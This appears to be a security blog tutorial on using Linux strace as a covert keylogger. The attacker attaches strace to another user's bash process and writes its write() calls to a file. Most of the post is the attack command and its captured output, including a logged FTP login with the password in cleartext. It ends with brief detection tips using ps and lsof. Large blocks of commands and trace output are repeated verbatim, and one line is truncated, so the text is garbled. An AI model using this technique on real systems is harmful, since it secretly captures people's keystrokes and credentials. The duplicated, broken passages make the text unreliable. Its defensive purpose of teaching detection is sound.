The strace tool is commonly used for debugging applications
in Linux, tracing system calls and signals. Because it is more than likely already
a part of your OS, we will look at how an attacker can use a tool which is
already there to his advantage.
Assumption: The attacker is currently on the machine we are
using
For this example, we will perform the following:
1. Initiate and attach strace to a specific PID
2. Capture all key strokes from this PID and or any child it forks (creates)
3. Store this information to a file for offline analysis
Let’s begin!
Let’s see what shells we currently have available
root@securitynik:~# ps aux | grep bash
root 3103 0.0 0.6 6140 3392 pts/0 Ss+ 17:14 0:00 bash
root 3199 0.0 0.6 6140 3540 pts/1 Ss 17:18 0:00 bash
root 3373 0.0 0.1 3488 768 pts/1 S+ 18:06 0:00 grep bash
Hmmm. Let’s see which one belongs to us
root@securitynik:~# tty
/dev/pts/1
Looks like we are currently using /dev/pts/1. Guess that means /dev/pts/0 is the one we should hook into. Let’s do that.
Let’s start strace and send it to the background
root@securitynik:~# tty
/dev/pts/1
Looks like we are currently using /dev/pts/1. Guess that means /dev/pts/0 is the one we should hook into. Let’s do that.
Let’s start strace and send it to the background
root@securitynik:~# strace
-p 3103 -t -e write -q -f -o keylogger.txt &
[1] 3432
Above we are telling strace to do the following:
1. –p 3103: connect to PID 3103, which above is on pts/0
2. –t : print the time of day
3. –e write: only capture write calls
4. –q : be quiet
5. –f : follow any fork (created) process
6. –o keylogger.txt: output the results to a file named keylogger.txt
[1] 3432
Above we are telling strace to do the following:
1. –p 3103: connect to PID 3103, which above is on pts/0
2. –t : print the time of day
3. –e write: only capture write calls
4. –q : be quiet
5. –f : follow any fork (created) process
6. –o keylogger.txt: output the results to a file named keylogger.txt
using the console with the PID 3103 let’s run a few commands and connect to a remote system running FTP:
root@securitynik:~# id
uid=0(root) gid=0(root) groups=0(root)
root@securitynik:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
root@securitynik:~# ftp 192.168.0.50
Connected to 192.168.0.50.
220 Microsoft FTP Service
Name (192.168.0.50:root): administrator
331 Password required for administrator.
Password:
230-Welcome to securitynik FTP Server :-D
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> exit
221 Do return soon :-)
So the above commands were run but what did we capture?
Let’s find out … the file will be truncated for brevity
root@securitynik:~# cat keylogger.txt | more
-------- results from the ID command ---------
3103 18:20:51 write(2, "i", 1) = 1
3103 18:20:51 write(2, "d", 1) = 1
3103 18:20:52 write(2, "\n", 1) = 1
3449 18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"..., 39) = 39
--------- results from cat /etc/passwd
3103 18:20:57 write(2, "c", 1) = 1
3103 18:20:57 write(2, "a", 1) = 1
3103 18:20:57 write(2, "t", 1) = 1
3103 18:20:57 write(2, " ", 1) = 1
3103 18:20:58 write(2, "/", 1) = 1
3103 18:20:58 write(2, "e", 1) = 1
3103 18:20:58 write(2, "t", 1) = 1
……..
3103 18:20:59 write(3, "/etc", 4) = 4
3103 18:20:59 write(3, "\n", 1) = 1
3103 18:20:59 write(2, "c/", 2) = 2
3103 18:21:01 write(2, "p", 1) = 1
3103 18:21:01 write(2, "a", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "w", 1) = 1
3103 18:21:02 write(2, "d", 1) = 1
3103 18:21:02 write(2, "\n", 1) = 1
3468 18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 2279) = 2279
---------- and last but not least the results from the FTP session
--------
103 18:21:02 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103 18:21:17 write(2, "f", 1) = 1
3103 18:21:18 write(2, "t", 1) = 1
3103 18:21:18 write(2, "p", 1) = 1
…..
3103 18:21:24 write(2, "1", 1) = 1
3103 18:21:24 write(2, "9", 1) = 1
3103 18:21:24 write(2, "2", 1) = 1
3103 18:21:24 write(2, ".", 1) = 1
3103 18:21:25 write(2, "1", 1) = 1
3103 18:21:25 write(2, "6", 1) = 1
3103 18:21:25 write(2, "8", 1) = 1
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "0", 1) =
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "5", 1) = 1
3103 18:21:26 write(2, "0", 1) = 1
3103 18:21:27 write(2, "\n", 1) = 1
3470 18:21:27 write(1, "Connected to 192.168.0.50.\n", 27) = 27
3470 18:21:27 write(1, "220 Microsoft FTP Service\n", 26) = 26
3470 18:21:27 write(1, "Name (192.168.0.50:root): ", 26) = 26
3470 18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470 18:21:31 write(1, "331 Password required for admini"..., 41) = 41
3470 18:21:31 write(6, "Password:", 9) = 9
3470 18:21:35 write(6, "\n", 1) = 1
3470 18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470 18:21:35 write(1, "230-Welcome to securitynik FTP S"..., 42) = 42
3470 18:21:35 write(1, "230 User administrator logged in"..., 34) = 34
3470 18:21:35 write(5, "SYST\r\n", 6) = 6
3470 18:21:35 write(1, "Remote system type is Windows_NT"..., 34) = 34
3470 18:21:35 write(1, "ftp> ", 5) = 5
3470 18:21:38 write(1, "d", 1) = 1
3470 18:21:39 write(1, "i", 1) = 1
3470 18:21:39 write(1, "r", 1) = 1
3470 18:21:39 write(1, "\n", 1) = 1
3470 18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n", 26) = 26
3470 18:21:39 write(1, "200 PORT command successful.\n", 29) = 29
3470 18:21:39 write(5, "LIST\r\n", 6) = 6
3470 18:21:39 write(1, "150 Opening ASCII mode data conn"..., 52) = 52
3470 18:21:39 write(1, "226 Transfer complete.\n", 23) = 23
3470 18:21:39 write(1, "ftp> ", 5) = 5
3470 18:21:43 write(1, "e", 1) = 1
3470 18:21:43 write(1, "x", 1) = 1
3470 18:21:44 write(1, "i", 1) = 1
3470 18:21:44 write(1, "t", 1) = 1
3470 18:21:44 write(1, "\n", 1) = 1
3470 18:21:44 write(5, "QUIT\r\n", 6) = 6
3470 18:21:44 write(1, "221 Do return soon :-) \n", 24) = 24
3103 18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---
3103 18:21:44 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
103 18:21:02 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103 18:21:17 write(2, "f", 1) = 1
3103 18:21:18 write(2, "t", 1) = 1
3103 18:21:18 write(2, "p", 1) = 1
…..
3103 18:21:24 write(2, "1", 1) = 1
3103 18:21:24 write(2, "9", 1) = 1
3103 18:21:24 write(2, "2", 1) = 1
3103 18:21:24 write(2, ".", 1) = 1
3103 18:21:25 write(2, "1", 1) = 1
3103 18:21:25 write(2, "6", 1) = 1
3103 18:21:25 write(2, "8", 1) = 1
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "0", 1) =
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "5", 1) = 1
3103 18:21:26 write(2, "0", 1) = 1
3103 18:21:27 write(2, "\n", 1) = 1
3470 18:21:27 write(1, "Connected to 192.168.0.50.\n", 27) = 27
3470 18:21:27 write(1, "220 Microsoft FTP Service\n", 26) = 26
3470 18:21:27 write(1, "Name (192.168.0.50:root): ", 26) = 26
3470 18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470 18:21:31 write(1, "331 Password required for admini"..., 41) = 41
3470 18:21:31 write(6, "Password:", 9) = 9
3470 18:21:35 write(6, "\n", 1) = 1
3470 18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470 18:21:35 write(1, "230-Welcome to securitynik FTP S"..., 42) = 42
3470 18:21:35 write(1, "230 User administrator logged in"..., 34) = 34
3470 18:21:35 write(5, "SYST\r\n", 6) = 6
3470 18:21:35 write(1, "Remote system type is Windows_NT"..., 34) = 34
3470 18:21:35 write(1, "ftp> ", 5) = 5
3470 18:21:38 write(1, "d", 1) = 1
3470 18:21:39 write(1, "i", 1) = 1
3470 18:21:39 write(1, "r", 1) = 1
3470 18:21:39 write(1, "\n", 1) = 1
3470 18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n", 26) = 26
3470 18:21:39 write(1, "200 PORT command successful.\n", 29) = 29
3470 18:21:39 write(5, "LIST\r\n", 6) = 6
3470 18:21:39 write(1, "150 Opening ASCII mode data conn"..., 52) = 52
3470 18:21:39 write(1, "226 Transfer complete.\n", 23) = 23
3470 18:21:39 write(1, "ftp> ", 5) = 5
3470 18:21:43 write(1, "e", 1) = 1
3470 18:21:43 write(1, "x", 1) = 1
3470 18:21:44 write(1, "i", 1) = 1
3470 18:21:44 write(1, "t", 1) = 1
3470 18:21:44 write(1, "\n", 1) = 1
3470 18:21:44 write(5, "QUIT\r\n", 6) = 6
3470 18:21:44 write(1, "221 Do return soon :-) \n", 24) = 24
3103 18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---
3103 18:21:44 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
As can be seen, the tools on our systems can easily be used
for good just as it can for bad.
How to mitigate this?
Be aware of what processes you expect to see on your systems
If you don’t use strace for debugging and see it in your “ps
aux” output, then you may need to investigate why it may be there.
root@securitynik:~# ps aux | grep strace
root 3432 0.0 0.1 2088 644 pts/1 S 18:15 0:00 strace -p 3103 -t -e write -q -f -o keylogger.txt
root@securitynik:~# ps aux | grep strace
root 3432 0.0 0.1 2088 644 pts/1 S 18:15 0:00 strace -p 3103 -t -e write -q -f -o keylogger.txt
Further checks
root@securitynik:~# lsof | grep strace
strace 3432 root cwd DIR 8,1 4096 785892 /root
strace 3432 root rtd DIR 8,1 4096 2 /
strace 3432 root txt REG 8,1 207880 785911 /usr/bin/strace
strace 3432 root mem REG 8,1 1441960 655121 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
strace 3432 root mem REG 8,1 117960 679406 /lib/i386-linux-gnu/ld-2.13.so
strace 3432 root 0u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 1u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 2u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 3w REG 8,1 4782 800789 /root/keylogger.txt
root@securitynik:~# lsof | grep strace
strace 3432 root cwd DIR 8,1 4096 785892 /root
strace 3432 root rtd DIR 8,1 4096 2 /
strace 3432 root txt REG 8,1 207880 785911 /usr/bin/strace
strace 3432 root mem REG 8,1 1441960 655121 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
strace 3432 root mem REG 8,1 117960 679406 /lib/i386-linux-gnu/ld-2.13.so
strace 3432 root 0u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 1u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 2u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 3w REG 8,1 4782 800789 /root/keylogger.txt
No comments:
Post a Comment